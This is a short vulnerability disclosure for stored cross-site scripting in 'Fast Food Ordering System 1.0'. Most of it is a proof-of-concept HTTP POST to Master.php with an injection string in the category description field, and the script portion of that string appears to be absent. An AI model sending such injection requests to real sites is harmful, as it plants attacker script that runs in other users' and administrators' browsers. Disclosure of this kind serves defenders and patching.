## Title: Fast Food Ordering System 1.0 Stored Cross-Site Scripting ## Author: Ashish Kumar ## Date: 05.31.2022 ## Vendor: https://www.sourcecodester.com/users/tips23 ## Software: https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html ## Reference: https://medium.com/@cyberthoth/fast-food-ordering-system-1-0-cross-site-scripting-7927f4b1edd6 #Description: #The Line 255 of Master.php sends unvalidated data to a web browser, which can result in the browser executing malicious code. #echo $Master->save_category(); #PoC: POST /ffos/classes/Master.php?f=save_category HTTP/1.1 Host: localhost Content-Length: 480 sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99" Accept: application/json, text/javascript, */*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySmYVeqOBMhcSziZM X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/ffos/admin/?page=categories Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: PHPSESSID=junl7tbvb7hvrdeq776aislbcj Connection: close ------WebKitFormBoundarySmYVeqOBMhcSziZM Content-Disposition: form-data; name="id" 10 ------WebKitFormBoundarySmYVeqOBMhcSziZM Content-Disposition: form-data; name="name" XSS ------WebKitFormBoundarySmYVeqOBMhcSziZM Content-Disposition: form-data; name="description" Testing XSS "> ------WebKitFormBoundarySmYVeqOBMhcSziZM Content-Disposition: form-data; name="status" 1 ------WebKitFormBoundarySmYVeqOBMhcSziZM--